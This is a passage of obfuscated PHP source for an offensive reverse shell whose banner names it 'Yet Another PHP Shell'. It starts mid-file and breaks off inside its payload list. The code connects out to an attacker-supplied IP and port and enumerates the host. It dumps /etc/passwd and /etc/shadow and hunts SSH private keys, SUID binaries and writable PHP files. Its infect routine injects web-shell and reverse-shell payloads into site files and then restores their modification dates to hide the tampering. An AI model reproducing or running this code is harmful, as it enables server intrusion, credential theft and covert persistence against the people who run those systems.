run_cmd("\x6c\x73\142\x5f\x72\145\154\x65\141\x73\x65\40\x2d\141\40\x7c\x20\x67\162\x65\x70\x20\x2d\166\x20\x27\116\157\x20\114\123\x42\x27") . PHP_EOL; $info .= cyan("\x5b\x69\135\40\110\157\x73\x74\156\x61\x6d\145\72\x20") . run_cmd("\x68\x6f\x73\164\x6e\x61\x6d\x65"); $info .= cyan("\133\x69\135\x20\x4b\x65\162\156\145\x6c\x3a\x20") . run_cmd("\x75\156\x61\155\145\x20\x2d\x61"); $info .= cyan("\x5b\x69\x5d\40\x43\x50\x55\72\x20\xa") . 
run_cmd("\143\141\164\x20\x2f\160\x72\157\x63\57\x63\160\x75\151\x6e\x66\157\x20\x7c\40\x67\162\145\x70\x20\x2d\151\40\47\155\x6f\x64\x65\154\x20\156\141\155\145\47\40\174\x20\x63\165\x74\40\55\144\x27\72\x27\40\x2d\146\x20\x32\40\x7c\40\163\145\144\40\x27\x73\x2f\136\x20\x2a\57\57\x67\47"); $info .= cyan("\133\151\135\x20\122\x41\x4d\x3a\40\xa") . run_cmd("\x63\x61\164\40\x2f\160\162\x6f\x63\x2f\x6d\145\155\x69\x6e\146\x6f\x20\x7c\x20\x65\147\x72\x65\160\40\55\x69\x20\x27\50\155\x65\155\164\x6f\x74\141\154\174\155\145\155\146\162\145\x65\51\x27"); $info .= cyan("\133\x69\135\40\123\x75\144\157\40\x76\145\162\x73\x69\x6f\156\72\40") . run_cmd("\163\165\x64\x6f\40\55\55\x76\x65\x72\163\151\x6f\x6e\40\174\x20\147\x72\x65\x70\40\47\123\x75\x64\157\x20\166\145\162\163\151\157\156\47\x20\x7c\40\143\x75\x74\40\55\x64\47\x20\x27\x20\55\x66\x20\x33"); $info .= cyan("\x5b\151\x5d\40\x55\163\145\x72\57\147\x72\157\165\160\163\x3a\40") . run_cmd("\x69\144") . PHP_EOL; $info .= cyan("\x5b\x69\135\40\101\x63\x74\x69\x76\x65\40\x54\x54\131\x3a\x20\xa") . run_cmd("\167") . PHP_EOL; fwrite($s, $info); fwrite($s, green("\x3d\x3d\75\75\75\75\x3d\75\x3d\x3d\x3d\x3d\x3d\75\75\x3d\x3d\x3d\x3d\75\75\x3d\x20\125\163\145\162\163\40\151\156\x66\x6f\x20\x3d\75\75\75\75\75\75\75\75\x3d\x3d\75\x3d\75\75\x3d\75\75\75\x3d\x3d\x3d\12\xa")); $info = cyan("\x5b\151\135\40\103\x75\162\162\x65\156\x74\x20\x75\163\145\162\x3a\40") . run_cmd("\167\x68\x6f\x61\x6d\151"); $info .= cyan("\x5b\x69\x5d\40\125\163\x65\162\x73\40\x69\x6e\x20\x2f\150\x6f\155\145\x3a\40\xa") . run_cmd("\x6c\x73\40\x2f\150\x6f\x6d\145") . PHP_EOL; $info .= cyan("\133\x69\135\x20\103\x72\157\x6e\164\x61\142\40\x6f\146\40\x63\x75\x72\162\x65\x6e\164\x20\x75\x73\145\162\72\40\xa") . run_cmd("\143\162\x6f\156\x74\141\142\40\55\x6c\x20\x7c\x20\145\x67\x72\145\160\40\x2d\x76\40\47\136\43\x27") . PHP_EOL; $info .= cyan("\133\x69\135\x20\x43\162\x6f\156\164\x61\142\x3a\40\12") . 
run_cmd("\143\x61\164\40\57\x65\x74\143\x2f\x63\162\x6f\x6e\x74\141\142\x20\174\x20\145\147\162\x65\x70\x20\55\166\40\47\136\x23\x27") . PHP_EOL; fwrite($s, $info); fwrite($s, green("\75\x3d\75\75\x3d\x3d\75\75\x3d\x3d\75\75\75\75\75\75\75\75\x3d\x3d\75\75\40\x41\x6c\x6c\x20\x75\163\x65\162\163\40\75\x3d\75\75\75\75\75\x3d\75\x3d\75\75\x3d\75\x3d\x3d\75\x3d\75\x3d\75\x3d\xa\xa")); fwrite($s, run_cmd("\143\141\x74\40\x2f\145\164\143\57\160\x61\x73\x73\x77\x64") . PHP_EOL); if (is_readable("\57\145\x74\143\x2f\x73\x68\x61\x64\x6f\167")) { fwrite($s, red("\133\x21\135\x20\x2f\x65\164\x63\x2f\x73\150\x61\144\x6f\167\x20\x69\163\40\162\x65\x61\x64\x61\x62\154\x65\x21\12") . run_cmd("\143\141\x74\40\x2f\x65\164\143\57\x73\150\141\144\157\167") . PHP_EOL); } fwrite($s, green("\75\x3d\75\x3d\x3d\75\x3d\x3d\x3d\75\x3d\x3d\75\x3d\x3d\75\75\75\x3d\75\x3d\x3d\x20\116\x65\x74\x20\151\156\x66\157\x20\x3d\x3d\x3d\x3d\75\75\75\x3d\x3d\x3d\75\75\x3d\75\75\75\75\75\75\75\75\75\xa\xa")); $info = cyan("\x5b\x69\135\40\x49\120\40\111\156\x66\157\x3a\40\12") . run_cmd("\x69\x66\143\x6f\x6e\146\x69\x67") . PHP_EOL; $info .= cyan("\x5b\x69\135\40\x48\x6f\x73\164\163\72\x20\12") . run_cmd("\143\141\164\40\x2f\x65\164\x63\x2f\150\x6f\163\x74\163\40\x7c\40\x67\x72\x65\160\40\55\166\x20\x27\x5e\x23\x27") . PHP_EOL; $info .= cyan("\x5b\x69\x5d\40\111\x6e\x74\x65\162\x66\141\x63\x65\163\x2f\x72\x6f\165\164\x65\x73\72\40\xa") . run_cmd("\x63\x61\164\x20\57\x65\x74\x63\57\x6e\145\x74\x77\x6f\162\153\163\40\46\x26\40\x72\157\x75\164\145") . PHP_EOL; $info .= cyan("\133\x69\x5d\x20\x49\x50\40\124\141\142\x6c\x65\163\x20\162\x75\x6c\145\163\x3a\x20\12") . run_cmd("\50\x69\x70\x74\141\x62\154\145\x73\40\x2d\x2d\154\151\x73\x74\x2d\x72\165\154\145\163\x20\62\76\x2f\x64\145\166\57\x6e\x75\x6c\x6c\x29") . PHP_EOL; $info .= cyan("\x5b\151\135\40\101\x63\x74\x69\166\x65\40\x70\x6f\x72\164\x73\x3a\40\xa") . 
run_cmd("\50\156\x65\164\x73\x74\141\x74\x20\x2d\x70\165\156\x74\141\x29\40\x32\76\57\144\x65\166\57\156\165\154\x6c") . PHP_EOL; fwrite($s, $info); fwrite($s, green("\75\75\75\75\x3d\x3d\x3d\x3d\x3d\x3d\75\75\x3d\x3d\x3d\75\x3d\x3d\x3d\x3d\x3d\75\40\111\x6e\164\x65\162\145\163\164\x69\156\x67\40\x62\x69\156\141\x72\x69\x65\x73\40\x3d\x3d\75\75\75\x3d\75\75\75\75\75\x3d\75\75\75\x3d\x3d\x3d\75\75\x3d\75\12\12")); $interesting_binaries = array("\156\x63", "\x6e\143\x2e\164\x72\x61\x64\151\x74\151\x6f\x6e\x61\x6c", "\156\143\141\x74", "\156\155\141\x70", "\x70\x65\162\154", "\x70\x79\x74\150\x6f\156", "\x70\171\x74\150\x6f\156\x32", "\x70\x79\x74\x68\x6f\x6e\x32\x2e\66", "\160\171\x74\x68\x6f\156\x32\x2e\67", "\x70\171\164\x68\x6f\156\x33", "\x70\171\x74\x68\x6f\x6e\x33\56\66", "\160\171\x74\x68\157\x6e\x33\x2e\x37", "\x72\x75\x62\x79", "\x6e\x6f\x64\x65", "\147\143\x63", "\147\53\x2b", "\144\x6f\143\x6b\145\x72", "\160\150\x70"); foreach ($interesting_binaries as $binary) { $binary = shell_exec("\x77\150\151\143\x68\40{$binary}\x20\x32\x3e\x2f\144\x65\166\57\156\x75\154\154"); if ($binary !== '' && base64_encode($binary . 
PHP_EOL) !== "\x43\147\75\x3d") { fwrite($s, run_cmd("\x6c\163\40\55\154\x20{$binary}")); } } fwrite($s, green("\12\x3d\x3d\75\75\x3d\75\75\75\x3d\x3d\x3d\75\x3d\75\75\x3d\75\75\75\75\x3d\x3d\x20\123\x55\111\x44\40\142\x69\156\x61\162\x69\145\x73\x20\75\75\75\75\x3d\75\75\x3d\x3d\75\75\75\x3d\x3d\x3d\75\x3d\x3d\x3d\75\x3d\x3d\12\xa")); $suid_list = explode("\12", shell_exec("\146\151\x6e\144\x20\x2f\x20\55\164\x79\x70\x65\x20\x66\x20\55\160\145\162\155\x20\x2f\64\60\x30\x30\x20\62\x3e\57\144\x65\x76\x2f\156\x75\154\x6c")); foreach ($suid_list as $suid) { if ($suid !== '') { fwrite($s, run_cmd("\154\163\40\55\154\x20{$suid}")); } } fwrite($s, green("\xa\x3d\75\x3d\x3d\x3d\x3d\x3d\x3d\75\75\x3d\x3d\x3d\75\x3d\75\75\75\75\x3d\75\75\40\123\x53\x48\x20\146\151\154\x65\163\x20\75\x3d\x3d\75\75\x3d\x3d\x3d\75\75\x3d\x3d\75\x3d\75\x3d\x3d\75\x3d\x3d\75\75\xa\12")); $authorized_keys = explode("\12", shell_exec("\146\x69\x6e\x64\x20\x2f\x20\x2d\x74\171\160\145\x20\146\x20\x2d\x6e\x61\x6d\145\x20\141\165\x74\x68\157\162\x69\x7a\x65\144\137\153\x65\171\163\40\62\76\57\144\145\x76\x2f\x6e\x75\154\154")); foreach ($authorized_keys as $public_key) { if (is_writable($public_key)) { fwrite($s, red("\x5b\127\x72\151\x74\x61\x62\154\145\x5d\40") . $public_key . PHP_EOL); } else { fwrite($s, $public_key . PHP_EOL); } } $id_rsa = explode("\12", shell_exec("\146\151\156\144\x20\x2f\x20\x2d\x74\x79\x70\145\x20\x66\x20\x2d\x6e\141\x6d\145\x20\x69\144\x5f\162\163\x61\40\62\x3e\x2f\x64\x65\166\57\156\165\154\x6c")); foreach ($id_rsa as $priv_key) { if (is_readable($priv_key)) { fwrite($s, red("\133\122\145\141\144\x61\142\154\x65\x5d\x20") . $priv_key . PHP_EOL); } else { fwrite($s, $priv_key . 
PHP_EOL); } } fwrite($s, green("\12\75\75\x3d\x3d\x3d\75\x3d\75\x3d\75\x3d\75\x3d\75\x3d\x3d\x3d\75\x3d\40\x57\162\x69\164\x61\142\x6c\x65\40\120\110\120\x20\x66\151\x6c\x65\x73\x20\75\75\x3d\x3d\x3d\75\x3d\75\x3d\x3d\75\75\x3d\75\75\x3d\75\x3d\x3d\xa\12")); $webfiles_arr = array(); $webdir = array("\x2f\x76\x61\162\x2f\x77\x77\x77", "\57\x73\162\166", "\57\x75\x73\x72\x2f\x6c\x6f\143\x61\x6c\x2f\141\x70\141\x63\150\145\62", "\x2f\166\x61\162\x2f\x61\x70\141\143\x68\145\62", "\x2f\x76\x61\x72\57\167\x77\167\57\x6e\147\x69\x6e\170\x2d\144\145\146\x61\x75\154\164"); foreach ($webdir as $dir) { $webfiles_arr = array_merge($webfiles_arr, explode("\12", shell_exec("\x66\x69\x6e\x64\x20" . $dir . "\x20\x2d\164\171\x70\x65\40\x66\40\x2d\156\x61\155\145\x20\x27\52\x2e\x70\x68\x70\x2a\47\40\55\x77\x72\x69\164\x61\142\154\145\40\62\76\57\x64\145\166\x2f\x6e\x75\x6c\154"))); } if (count($webfiles_arr) > 25) { for ($i = 0; $i < 25; $i++) { if ($webfiles_arr[$i] !== '') { fwrite($s, red("\133\x57\162\x69\164\141\x62\154\145\135\40") . $webfiles_arr[$i] . PHP_EOL); } } fwrite($s, "\56\56\x2e\12\56\x2e\x2e" . PHP_EOL); fwrite($s, green("\x5b\53\135\40") . "\123\150\x6f\167\x69\156\147\40\x6f\x6e\154\x79\40\164\x68\145\x20\x66\151\162\x73\x74\40\x32\65\x20\x66\151\154\145\x73\56\x20\124\150\x65\162\x65\x20\x61\162\145\x20\155\157\x72\x65\41" . PHP_EOL); } else { foreach ($webfiles_arr as $file) { if ($file !== '') { fwrite($s, red("\x5b\127\x72\151\x74\141\142\154\145\x5d\40") . $file . PHP_EOL); } } } fwrite($s, cyan("\12\x5b\x69\135") . "\40\x47\x65\x74\40\155\157\x72\145\40\x69\156\146\x6f\162\155\141\x74\x69\157\156\x20\167\151\164\150\x20\x21\145\x6e\165\x6d\x2e" . 
PHP_EOL); } goto Sjo8m; KkL02: set_time_limit(0); goto kXDc2; QBC7U: $commands = array("\x61\154\x6c\55\x63\157\154\157\x72\x73", "\143\x6f\154\x6f\x72", "\x64\165\160\154\x69\x63\141\164\x65", "\x65\x6e\165\x6d", "\x68\145\x6c\160", "\x69\x6e\x66\x65\143\x74", "\x69\x6e\x66\157", "\160\141\x73\163\167\x64", "\x70\x68\x70", "\x73\164\x61\x62\151\x6c\151\x7a\145", "\163\165\147\x67\145\163\164\145\x72"); goto UVSoS; Wuvgt: function refresh_ps1($changecolor = false) { global $ps1_color, $ps1; $user = str_replace(PHP_EOL, '', run_cmd("\167\150\157\x61\x6d\151")); if (!$ps1_color) { $ps1 = white("\x5b\x59\101\x50\x53\135\40") . str_replace(PHP_EOL, '', green($user . "\100" . run_cmd("\150\157\163\164\x6e\141\155\145")) . "\x3a" . cyan(run_cmd("\160\167\144")) . "\44\x20"); if ($user == "\x72\x6f\157\164") { $ps1 = white("\x5b\x59\x41\120\123\x5d\x20") . str_replace(PHP_EOL, '', red($user . "\100" . run_cmd("\150\157\163\x74\x6e\x61\x6d\x65")) . "\x3a" . cyan(run_cmd("\160\167\144")) . "\x23\40"); } if ($changecolor) { $ps1_color = true; } } else { $ps1 = white("\133\x59\101\120\123\x5d\40") . str_replace(PHP_EOL, '', $user . "\x40" . run_cmd("\x68\157\163\164\156\x61\x6d\145") . "\x3a" . run_cmd("\160\167\x64") . "\x24\x20"); if ($user == "\x72\157\x6f\x74") { $ps1 = white("\133\x59\101\x50\x53\135\40") . str_replace(PHP_EOL, '', $user . "\x40" . run_cmd("\150\157\x73\164\x6e\141\155\x65") . "\x3a" . run_cmd("\x70\167\x64") . "\x23\x20"); } if ($changecolor) { $ps1_color = false; } } } goto gxovs; vng9E: function infect($allFiles, $fileArr, $payload_index, $payload_list, $position = 1) { global $s; $payload = $payload_list[array_keys($payload_list)[$payload_index]]; fwrite($s, yellow("\xa\x5b\41\x5d\40") . white("\x46\151\154\x65\x73\40\164\157\40\x69\x6e\146\x65\x63\164\72\12")); foreach ($fileArr as $fileToInfect) { fwrite($s, $allFiles[$fileToInfect] . "\12"); } fwrite($s, yellow("\133\41\135\40") . white("\x50\x61\x79\154\x6f\x61\144\72\x20") . 
$payload_list[array_keys($payload_list)[$payload_index]] . "\xa"); $position_str = $position ? "\105\156\x64\40\x6f\x66\x20\146\151\x6c\x65" : "\102\x65\x67\151\156\156\151\x67\40\157\146\x20\146\x69\154\x65"; fwrite($s, yellow("\x5b\41\135\x20") . white("\x50\x6f\163\151\164\x69\157\x6e\x3a\40") . $position_str . "\12"); fwrite($s, cyan("\133\x3f\135\x20") . white("\x41\x72\145\40\171\x6f\x75\40\x73\x75\x72\x65\40\x79\157\165\40\x77\141\156\164\40\x74\157\x20\151\x6e\146\x65\x63\x74\x20\x74\150\157\x73\x65\40\146\151\x6c\x65\163\77\40\x5b\131\x2f\x6e\x5d")); while ($sure = fread($s, 128)) { if (strtolower(substr($sure, 0, 1)) == "\156") { return; } break; } foreach ($fileArr as $fileToInfect) { $filePath = $allFiles[$fileToInfect]; if (isAvailable("\x66\x69\154\145\137\147\145\164\137\x63\x6f\156\x74\145\156\164\163") && isAvailable("\x66\151\154\x65\137\x70\x75\x74\137\x63\157\156\x74\x65\156\x74\x73")) { $old = file_get_contents($filePath); $originalDate = str_replace("\12", '', run_cmd("\163\164\x61\x74\x20" . $filePath . "\x20\174\x20\x67\162\x65\x70\x20\115\157\144\151\146\171\40\174\40\163\x65\x64\40\x22\x73\57\115\157\x64\151\x66\171\72\40\57\57\x22")); if ($position) { $written = file_put_contents($filePath, "\xa" . $payload, FILE_APPEND) ? 1 : 0; } else { $written = file_put_contents($filePath, $payload . "\xa" . $old) ? 1 : 0; } $result = $written ? green("\x5b\53\x5d\x20") . white($filePath . "\40\167\141\x73\40\x69\x6e\146\145\x63\164\x65\144\x20\x77\151\164\150\40\160\x61\171\x6c\x6f\x61\x64\x20\41") : red("\133\55\135\x20") . white($filePath . "\x20\x45\x72\x72\157\162\x21"); fwrite($s, $result . "\xa"); if (run_cmd("\164\157\x75\143\150\x20\55\x64\40" . "\x22" . $originalDate . "\x22\x20" . $filePath)) { fwrite($s, green("\x5b\53\135\40") . white("\115\x61\156\164\x61\x69\156\145\144\40\x6f\162\x69\x67\x69\x6e\141\x6c\x20\x27\155\x6f\x64\151\x66\x69\x65\144\40\x64\x61\x74\145\47\40\x28" . $originalDate . 
"\x29\x2e\12")); } } } return; } goto idP0M; EKCVq: $long_args = array("\x75\x70\x64\x61\x74\145\72\x3a", "\150\x65\154\160\72\72", "\x73\x69\x6c\x65\x6e\164\72\x3a"); goto iyx8E; kemz6: $salt = "\166\137\x33\137\x72\x5f\x59\137\x5f\137\107\137\157\x5f\60\137\144\137\x5f\x5f\163\137\x34\x5f\114\x5f\164"; goto CXh7h; o75dl: function runPHP($code) { try { ob_start(); eval($code); $result = ob_get_contents(); ob_end_clean(); } catch (Throwable $ex) { $err = explode("\123\x74\141\143\153\40\x74\162\141\x63\145\x3a", $ex); $result = $err[0]; } return $result; } goto Wym75; jsOgp: function getFiles($dir) { $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($dir)); $list = array(); foreach ($iterator as $file) { if (!is_dir($file) && is_writable($file)) { if ($file->getPathName() !== $_SERVER["\123\103\122\111\x50\x54\137\106\x49\x4c\x45\116\101\115\x45"]) { if (substr($file->getPathName(), -4) == "\56\160\x68\160") { array_push($list, $file->getPathName()); } } } } sort($list); return $list; } goto lGppC; sfKGX: function toggle_password() { global $use_password, $s, $yaps; $yaps_code = file_get_contents($yaps); if ($use_password) { $new_yaps_code = preg_replace("\57\50\x5c\x24\165\x73\x65\137\160\x61\163\x73\x77\x6f\162\144\40\53\75\x20\x2b\x29\x28\164\x72\165\x65\51\x2f", "\44\x31\146\141\x6c\163\145", $yaps_code, 1); if (file_put_contents($yaps, $new_yaps_code)) { $use_password = false; fwrite($s, green("\133\x2b\x5d\x20") . "\120\141\163\x73\167\157\162\x64\x20\x64\x65\x61\143\164\151\x76\x61\164\145\144\x2e\12"); return true; } fwrite($s, red("\133\x2d\x5d\40") . 
"\103\157\165\x6c\x64\x6e\47\164\x20\x64\145\141\x63\x74\151\x76\x61\164\x65\40\160\x61\163\x73\167\157\162\x64\56\xa"); return false; } $new_yaps_code = preg_replace("\x2f\x28\x5c\44\x75\x73\x65\x5f\x70\x61\x73\163\x77\157\162\144\x20\x2b\x3d\x20\x2b\x29\x28\146\141\154\163\x65\51\x2f", "\44\61\164\162\x75\145", $yaps_code, 1); if (file_put_contents($yaps, $new_yaps_code)) { $use_password = false; fwrite($s, green("\x5b\x2b\135\40") . "\120\141\163\x73\x77\x6f\162\x64\x20\141\143\x74\151\166\x61\x74\145\144\x2e\xa"); return true; } fwrite($s, red("\133\x2d\x5d\x20") . "\103\x6f\165\154\x64\156\47\x74\40\x61\x63\164\151\166\141\x74\145\40\x70\x61\x73\163\167\x6f\x72\x64\56\12"); return false; } goto WYwps; pGTWf: if (isset($options["\165"]) || isset($options["\165\160\x64\x61\x74\x65"])) { die(verify_update()); } goto MwOOd; rHlHg: function get_request($url) { $response = false; if (isAvailable("\146\x69\x6c\x65\137\x67\x65\164\x5f\143\157\x6e\x74\x65\x6e\164\x73")) { $response = file_get_contents($url); } elseif (isAvailable("\146\162\145\141\144") && isAvailable("\x66\157\x70\x65\156") && ini_get("\x61\x6c\154\157\x77\137\x75\162\x6c\x5f\146\157\x70\x65\156")) { $response = fread(fopen($url, "\x72"), 10); } elseif (in_array("\x63\x75\x72\x6c", get_loaded_extensions())) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $response = curl_exec($ch); curl_close($ch); } elseif ($tmp_curl = run_cmd("\143\165\x72\154\x20\x2d\163\x20" . $url)) { $response = $tmp_curl; } elseif ($tmp_wget = run_cmd("\x77\147\145\164\x20\55\161\x4f\55\40" . 
$url)) { $response = $tmp_wget; } return $response; } goto MIocV; zJ69L: if (php_sapi_name() == "\143\x6c\x69") { if ($argc >= 2 && preg_match("\57\x5e\x5b\x30\x2d\x39\135\53\x24\57", $argv[$argc - 1])) { $port = $argv[$argc - 1]; $ip = $argv[$argc - 2]; } else { foreach ($argv as $arg) { if (strpos($arg, "\72") !== false) { $socket = explode("\x3a", $arg); $ip = $socket[0]; $port = (int) $socket[1]; } } } } goto QBC7U; UVSoS: function green($str) { global $color; return $color ? "\33\x5b\71\x32\155" . $str . "\x1b\x5b\x30\x6d" : $str; } goto uFC47; idP0M: function parse_stdin($input) { global $s, $color; switch (substr($input, 0, -1)) { case "\x21\141\x6c\x6c\x2d\143\x6f\x6c\x6f\x72\x73": $color = !$color; break; case "\x21\151\x6e\146\x6f": return sysinfo(); break; case "\x21\145\x6e\x75\155": return enum(); break; case "\41\163\x75\147\x67\x65\163\164\x65\x72": return suggester(); break; case "\x21\143\157\154\x6f\x72": refresh_ps1(true); break; case "\x21\x68\145\154\160": return help(); break; case "\x21\160\150\x70": $phpCode = getPHP(); if ($phpCode !== 0) { $result = runPHP($phpCode); fwrite($s, $result); } else { fwrite($s, yellow("\133\151\x5d\40\103\x6f\x64\x65\x20\143\x61\156\x63\x65\x6c\x65\x64\56") . PHP_EOL); } break; case "\x21\163\164\141\x62\x69\x6c\151\172\x65": stabilize(); break; case "\41\x62\141\143\153\144\x6f\x6f\x72": backdoor(); break; case "\x21\160\141\163\x73\x77\144": passwd(); break; case "\41\x64\165\160\154\151\x63\141\164\145": duplicate(); break; case "\x21\x69\x6e\x66\145\x63\164": select_files(); break; } } goto f9SPd; k28_t: if (isset($options["\x68"]) || isset($options["\x68\x65\x6c\160"])) { die(usage()); } goto pGTWf; ssUNI: function change_password($new) { global $salt, $yaps, $s; $new_hash = hash("\x73\x68\141\65\61\62", $salt . 
hash("\163\x68\x61\65\61\62", $new, false), false); if (!is_readable($yaps) || !is_writable($yaps)) { return false; } $yaps_code = file_get_contents($yaps); $new_yaps_code = preg_replace("\57\133\141\x2d\x66\x30\x2d\x39\x5d\x7b\61\x32\70\175\57", $new_hash, $yaps_code, 1); if (file_put_contents($yaps, $new_yaps_code)) { fwrite($s, green("\x5b\x2b\135\x20") . "\x50\x61\163\x73\x77\x6f\162\144\40\143\x68\x61\x6e\x67\145\x64\x2e\40\103\x68\x61\156\147\x65\163\40\167\x69\x6c\154\40\164\141\x6b\x65\40\x65\146\x66\x65\143\164\40\x6f\x6e\x20\156\x65\x78\x74\x20\143\157\156\x6e\145\143\x74\151\157\156\x2e\xa"); return true; } else { fwrite($s, red("\x5b\x2d\x5d\40") . "\103\x6f\x75\154\144\156\47\164\x20\x72\145\141\x64\x20\157\162\40\167\x72\151\164\x65\x20\164\150\x65\x20\146\151\154\x65\x2e\40\x41\x72\145\x20\164\150\x65\x20\160\145\x72\x6d\x69\163\163\x69\x6f\x6e\x73\x20\x72\151\147\x68\164\x3f\xa" . run_cmd("\154\x73\x20\x2d\154\x20" . $yaps . "\12")); return false; } } goto sfKGX; oxSzT: $banner = cyan("\12\x20\40\x20\x20\x20\x20\40\x6f\x20\40\40\x6f\x20\x20\40\117\x20\x20\40\x20\x6f\55\x2d\157\x20\40\x20\157\x2d\157\xa\x20\x20\40\x20\40\40\40\40\x5c\40\57\40\x20\40\57\40\134\40\x20\x20\x7c\40\x20\40\x29\x20\x28\xa\x20\40\40\x20\x20\x20\x20\x20\40\x4f\40\x20\x20\x6f\55\x2d\x2d\157\x20\x20\117\55\x2d\x6f\x20\x20\x20\157\x2d\x6f\12\40\x20\x20\x20\40\x20\x20\40\x20\174\x20\x20\x20\174\40\x20\40\174\40\x20\x7c\x20\40\x20\40\x20\40\x20\x20\x20\x29\12\x20\x20\x20\x20\40\x20\x20\x20\x20\x6f\x20\40\x20\x6f\40\40\40\x6f\x20\x20\157\x20\x20\x20\40\40\157\x2d\x2d\x6f\12\40\x20\x20\x20\x20\40\x20\40\x59\145\x74\40\101\156\157\x74\x68\x65\x72\40\x20\120\110\x50\40\40\123\x68\x65\x6c\x6c") . "\xa\40\40\x20\x20\x20\x20\x20\x20\x20\40\40\40\40\x20\x56\x65\162\x73\x69\x6f\x6e\x20" . $version . 
"\12\40\x20\x20\40\40\40\x20\x43\157\x64\145\162\x3a\x20\116\x69\x63\150\x6f\x6c\141\163\40\x46\x65\x72\x72\145\x69\x72\x61"; goto gn8lq; mBQZf: $yaps = $_SERVER["\x53\103\x52\x49\x50\124\137\x46\111\x4c\x45\x4e\101\x4d\x45"]; goto TwUwH; V18g8: function choose_payload($allFiles, $toInfect) { global $s; $payloads = array("\60\x2e\40\124\x69\156\171\x52\x43\x45\x9" => "\74\77\x3d\x60\44\137\x52\x45\121\125\105\123\124\133\60\x5d\x60\73\77\76", "\x31\x2e\x20\103\x6c\141\x73\x73\x69\143\x52\103\105\x9" => "\x3c\x3f\75\100\163\171\163\x74\x65\155\x28\x24\x5f\x52\x45\121\x55\105\123\124\133\60\x5d\51\x3b\x3f\x3e", "\x32\x2e\x20\x45\x76\x61\x6c\x9\x9" => "\x3c\77\x3d\100\145\x76\141\x6c\50\44\137\122\x45\121\x55\x45\x53\x54\133\60\x5d\51\x3b\77\x3e", "\x33\56\x20\102\141\x73\145\144\105\166\141\154\x9" => "\x3c\x3f\x3d\x40\145\166\141\154\x28\x62\141\163\145\x36\x34\x5f\x64\x65\143\x6f\144\x65\50\x24\x5f\x52\105\121\125\x45\x53\x54\133\x30\x5d\51\51\x3b\77\x3e", "\64\x2e\x20\x52\x65\155\x6f\164\145\x50\x48\x50\11" => "\74\77\75\x40\x65\x76\x61\x6c\50\x66\151\154\145\137\x67\x65\164\137\143\157\156\164\145\x6e\164\x73\x28\x24\137\122\105\x51\x55\105\x53\x54\133\x30\x5d\51\x29\73\77\76", "\65\56\40\122\x65\155\x6f\164\x65\125\x70\x6c\157\x61\x64\x9" => "\74\77\75\44\170\75\162\x61\x6e\144\x28\61\x30\60\x2c\71\x39\x39\51\73\100\146\x69\x6c\x65\x5f\x70\165\164\x5f\x63\157\156\x74\145\x6e\164\x73\x28\x22\x2e\x2f\x22\x2e\44\x78\56\x22\56\x22\56\x24\x5f\x52\105\121\125\105\123\124\x5b\x31\x5d\x2c\x40\x66\151\x6c\x65\137\x67\145\x74\137\143\x6f\x6e\x74\145\x6e\x74\163\x28\44\x5f\x52\105\121\x55\x45\123\x54\133\60\135\51\x29\x3b\x65\x63\150\x6f\x20\44\170\x2e\44\x5f\x52\x45\x51\125\x45\x53\124\x5b\61\x5d\x3b\x3f\76", "\66\x2e\x20\x4c\157\143\x61\154\x55\160\x6c\157\141\144\x9" => 
"\74\x3f\160\150\160\40\151\146\50\151\x73\163\x65\x74\50\44\x5f\106\111\114\105\123\x5b\x22\x30\42\x5d\x29\51\x69\x66\x28\155\157\x76\x65\x5f\165\x70\x6c\157\141\x64\145\x64\x5f\146\x69\x6c\x65\50\44\x5f\106\111\x4c\105\x53\133\x22\x30\x22\x5d\x5b\42\164\155\160\x5f\156\x61\x6d\x65\42\135\x2c\42\137\42\x2e\x24\x5f\x46\111\114\105\123\133\x22\x30\x22\x5d\133\x22\x6e\x61\x6d\145\x22\135\x29\51\x65\x63\150\157\42\125\160\x6c\157\141\144\145\x64\72\x20\x5f\x22\56\x24\x5f\x46\111\x4c\105\123\133\42\x30\x22\135\133\42\x6e\141\155\145\x22\x5d\73\x3f\76", "\x37\x2e\40\123\164\x61\x62\x6c\145\x53\150\145\x6c\x6c\x9" => "\x3c\x3f\x70\150\x70\x20\x24\141\75\42\x73\143\162\x69\x70\164\40\55\x71\x63\40\x2f\142\x69\156\57\x62\141\x73\x68\40\x2f\x64\x65\x76\x2f\x6e\165\154\x6c\42\73\x75\155\141\163\x6b\50\60\x29\73\44\x62\75\146\163\157\x63\x6b\x6f\x70\x65\156\x28\x24\137\122\105\121\x55\105\123\124\133\60\x5d\54\x24\x5f\122\105\x51\125\x45\123\x54\133\61\x5d\54\44\143\x2c\44\144\54\63\x30\51\73\44\145\x3d\x61\162\x72\x61\x79\50\x30\x3d\x3e\141\162\x72\x61\171\50\x22\x70\x69\160\x65\42\54\42\x72\x22\x29\x2c\x31\x3d\76\141\x72\162\x61\171\50\x22\160\151\160\145\x22\54\42\x77\x22\51\x2c\x32\x3d\x3e\141\162\x72\x61\171\50\x22\x70\x69\x70\145\42\x2c\42\167\x22\51\x29\73\x24\146\75\160\x72\157\143\137\x6f\x70\x65\156\x28\x24\x61\54\x24\145\x2c\x24\147\51\73\146\157\x72\145\x61\x63\x68\50\44\x67\x20\x61\x73\40\44\x70\51\x73\x74\162\145\141\x6d\137\x73\x65\164\x5f\142\x6c\157\x63\153\x69\156\x67\x28\44\160\54\x30\x29\73\163\164\162\145\x61\155\137\163\x65\164\x5f\x62\x6c\x6f\143\x6b\x69\156\x67\x28\x24\x62\x2c\x30\x29\73\x77\x68\151\154\x65\50\x21\x66\x65\x6f\x66\50\x24\142\51\51\x7b\44\151\x3d\x61\162\162\x61\x79\x28\x24\x62\x2c\44\x67\133\x31\x5d\x2c\x24\147\133\62\135\x29\x3b\x69\146\50\151\156\x5f\x61\162\162\x61\171\x28\x24\142\54\x24\x69\51\x29\146\167\x72\x69\x74\145\50\x24\x67\133\60\x5d\x2c\146\162\145\x61\x64\50\44\142\x2c\62\x30\64\x38\51\x29\x3b\x69\x66\x28\x69\156\x5f\141\x
